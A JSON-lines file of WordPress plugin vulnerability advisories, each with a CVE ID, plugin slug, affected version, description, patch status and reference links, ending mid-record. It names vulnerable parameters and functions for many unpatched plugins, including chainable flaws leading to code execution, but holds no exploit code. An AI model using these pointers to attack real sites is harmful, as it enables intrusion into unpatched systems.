{"CVE_ID":"CVE-2024-12473","slug":"ai-scribe-the-chatgpt-powered-seo-content-creation-wizard","versionImpact":"2.3","description":"The AI Scribe \u2013 SEO AI Writer, Content Generator, Humanizer, Blog Writer, SEO Optimizer, DALLE-3, AI WordPress Plugin ChatGPT (GPT-4o 128K) plugin for WordPress is vulnerable to SQL Injection via the 'template_id' parameter of the 'article_builder_generate_data' shortcode in all versions up to, and including, 2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L891\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-scribe-the-chatgpt-powered-seo-content-creation-wizard\\\/trunk\\\/article_builder.php#L891\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79125ac2-f3ed-40c9-a81b-340195fc8da5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79125ac2-f3ed-40c9-a81b-340195fc8da5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1653","slug":"ulisting","versionImpact":"2.1.7","description":"The Directory Listings WordPress plugin \u2013 uListing plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.7. This is due to the stm_listing_profile_edit AJAX action not having enough restriction on the user meta that can be updated. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ulisting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181b26e-89c7-4020-a3d4-29bdc88d7438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4181b26e-89c7-4020-a3d4-29bdc88d7438?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3610","slug":"short-tax-post","versionImpact":"2.1.2","description":"The Reales WP STPT plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.1.2. This is due to the plugin not properly validating a user's identity prior to updating their details like password. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's passwords and email addresses, including administrators, and leverage that to gain access to their account. This can be combined with CVE-2025-3609 to achieve remote code execution as an originally unauthenticated user with no account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c6b149-39d7-491a-9f3a-261087a52a03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c6b149-39d7-491a-9f3a-261087a52a03?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7229","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d16f6ba0-a47d-413f-a6d4-058910441009\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d16f6ba0-a47d-413f-a6d4-058910441009\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6040","slug":"easy-flashcards","versionImpact":"0.1","description":"The Easy Flashcards plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1. This is due to missing or incorrect nonce validation on the 'ef_settings_submenu' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-flashcards\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-flashcards\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ff97ee8-9732-4d26-b5e8-b744730e9c5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ff97ee8-9732-4d26-b5e8-b744730e9c5a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5752","slug":"vertical-scroll-image-slideshow-gallery","versionImpact":"11.1","description":"The Vertical scroll image slideshow gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 11.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-scroll-image-slideshow-gallery\\\/trunk\\\/vertical-scroll-image-slideshow-gallery.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vertical-scroll-image-slideshow-gallery\\\/trunk\\\/vertical-scroll-image-slideshow-gallery.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-scroll-image-slideshow-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/vertical-scroll-image-slideshow-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9abb15-f375-4dca-a998-e621d50fa273?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9abb15-f375-4dca-a998-e621d50fa273?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4779","slug":"user-submitted-posts","versionImpact":"20230811","description":"The User Submitted Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [usp_gallery] shortcode in versions up to, and including, 20230811 due to insufficient input sanitization and output escaping on user supplied attributes like 'before'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21ca709-183f-4dd1-849c-f1b2a4f7ec43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21ca709-183f-4dd1-849c-f1b2a4f7ec43?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961841\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961841\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35039","slug":"bdvs-password-reset","versionImpact":"0.0.15","description":"Improper Restriction of Excessive Authentication Attempts vulnerability in Be Devious Web Development Password Reset with Code for WordPress REST API allows Authentication Abuse. This issue affects Password Reset with Code for WordPress REST API: from n\/a through 0.0.15.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bdvs-password-reset\\\/wordpress-password-reset-with-code-for-wordpress-rest-api-plugin-0-0-15-privilege-escalation-due-to-weak-pin-generation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bdvs-password-reset\\\/wordpress-password-reset-with-code-for-wordpress-rest-api-plugin-0-0-15-privilege-escalation-due-to-weak-pin-generation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2194","slug":"wp-statistics","versionImpact":"14.5","description":"The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44e4bdd-d84e-4315-9232-48a3b240242d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047756%40wp-statistics&new=3047756%40wp-statistics&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4618","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.6","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Team Member widget in all versions up to, and including, 2.6.9.6 due to insufficient input sanitization and output escaping on user supplied 'url' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e82478c-e476-4cdf-ab72-f578331058e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e82478c-e476-4cdf-ab72-f578331058e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.6\\\/elements\\\/team-member\\\/team-member.php#L1696\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.6\\\/elements\\\/team-member\\\/team-member.php#L1696\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083582\\\/#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083582\\\/#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1634","slug":"calendar-booking","versionImpact":"3.5.10","description":"The Scheduling Plugin \u2013 Online Booking for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cbsb_disconnect_settings' function in all versions up to, and including, 3.5.10. This makes it possible for unauthenticated attackers to disconnect the plugin from the startbooking service and remove connection data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e642f9-74ff-47f1-a49d-99c8fdb26f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e642f9-74ff-47f1-a49d-99c8fdb26f4a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar-booking\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar-booking\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1715","slug":"adfoxly","versionImpact":"1.8.5","description":"The AdFoxly \u2013 Ad Manager, AdSense Ads & Ads.txt plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the adfoxly_ad_status() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to enable and disable ads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84792202-d089-4dca-b950-16aea968c58e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84792202-d089-4dca-b950-16aea968c58e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adfoxly\\\/trunk\\\/includes\\\/class-adfoxly-ajax.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adfoxly\\\/trunk\\\/includes\\\/class-adfoxly-ajax.php#L80\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9173","slug":"gf-custom-style","versionImpact":"2.0","description":"The GF Custom Style plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8500ac5b-44e6-47b9-ab16-e7636c3fea66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8500ac5b-44e6-47b9-ab16-e7636c3fea66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gf-custom-style\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gf-custom-style\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11783","slug":"finance-calculator-with-application-form","versionImpact":"2.2.1","description":"The Financial Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'finance_calculator' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finance-calculator-with-application-form\\\/tags\\\/2.2.1\\\/finance-calculator-with-aplication-form.php#L604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finance-calculator-with-application-form\\\/tags\\\/2.2.1\\\/finance-calculator-with-aplication-form.php#L604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9314970-1030-4488-8147-05ba1453182c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9314970-1030-4488-8147-05ba1453182c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13117","slug":"share-buttons","versionImpact":"2.7","description":"The Social Share Buttons for WordPress plugin through 2.7 allows an unauthenticated user to upload arbitrary images and change the path where they are uploaded","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3234cdac-f328-4f1e-a1de-31fbd86aefb9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3234cdac-f328-4f1e-a1de-31fbd86aefb9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3609","slug":"short-tax-post","versionImpact":"2.1.2","description":"The Reales WP STPT plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 2.1.2. This is due to the 'reales_user_signup_form' AJAX action not verifying if user registration is enabled, prior to registering a user. This makes it possible for unauthenticated attackers to create new user accounts, which can be leveraged with CVE-XX to achieve privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9f3250f-39a1-4ba1-b9a2-222926635ca0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9f3250f-39a1-4ba1-b9a2-222926635ca0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7228","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ddf1271-3826-44e2-8408-cfbe9c3cc547\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ddf1271-3826-44e2-8408-cfbe9c3cc547\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5589","slug":"streamweasels-kick-integration","versionImpact":"1.1.3","description":"The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018status-classic-offline-text\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309930\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309930\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45f98a96-8f32-49f9-bfc8-9beb316ce0bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45f98a96-8f32-49f9-bfc8-9beb316ce0bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7660","slug":"map-my-locations","versionImpact":"1.1","description":"The Map My Locations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'map_my_locations' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/class-map-my-locations-public.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/class-map-my-locations-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/partials\\\/map-my-locations-public-display.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/partials\\\/map-my-locations-public-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c84ad1-10c7-4b2f-82f3-7546fc8e337d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c84ad1-10c7-4b2f-82f3-7546fc8e337d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25148","slug":"wp-html-mail","versionImpact":"2.9.0.3","description":"The WP HTML Mail plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 2.9.0.3 due to insufficient input sanitization. This makes it possible for unauthenticated attackers to inject arbitrary HTML in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3af900c-4048-4f4f-93e9-c60ca34d015b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3af900c-4048-4f4f-93e9-c60ca34d015b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-html-mail\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-html-mail\\\/trunk\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2709","slug":"an-gradebook","versionImpact":"5.0.1","description":"The AN_GradeBook WordPress plugin through 5.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2504dadb-1086-4fa9-8fc7-b93018423515\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2504dadb-1086-4fa9-8fc7-b93018423515\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4792","slug":"duplicate-post-page-menu-custom-post-type","versionImpact":"2.3.1","description":"The Duplicate Post Page Menu & Custom Post Type plugin for WordPress is vulnerable to unauthorized page and post duplication due to a missing capability check on the duplicate_ppmc_post_as_draft function in versions up to, and including, 2.3.1. This makes it possible for authenticated attackers with subscriber access or higher to duplicate posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-post-page-menu-custom-post-type\\\/trunk\\\/duplicate-post-page-menu-cpt.php?rev=2871256#L383\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-post-page-menu-custom-post-type\\\/trunk\\\/duplicate-post-page-menu-cpt.php?rev=2871256#L383\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6bb08e8-9ef5-41db-a111-c377a5dfae77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6bb08e8-9ef5-41db-a111-c377a5dfae77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2963515%40duplicate-post-page-menu-custom-post-type&new=2963515%40duplicate-post-page-menu-custom-post-type&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2963515%40duplicate-post-page-menu-custom-post-type&new=2963515%40duplicate-post-page-menu-custom-post-type&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1559","slug":"link-library","versionImpact":"7.6","description":"The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'll_reciprocal' parameter in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2172","slug":"miniorange-malware-protection","versionImpact":"4.7.2","description":"The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and including, 4.7.2 (for Malware Scanner) and 2.1.1 (for Web Application Firewall). This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-malware-protection\\\/tags\\\/4.7.2\\\/handler\\\/login.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-malware-protection\\\/tags\\\/4.7.2\\\/handler\\\/login.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-malware-protection\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-malware-protection\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0845","slug":"pdf-viewer-for-elementor","versionImpact":"2.9.3","description":"The PDF Viewer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the render function in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 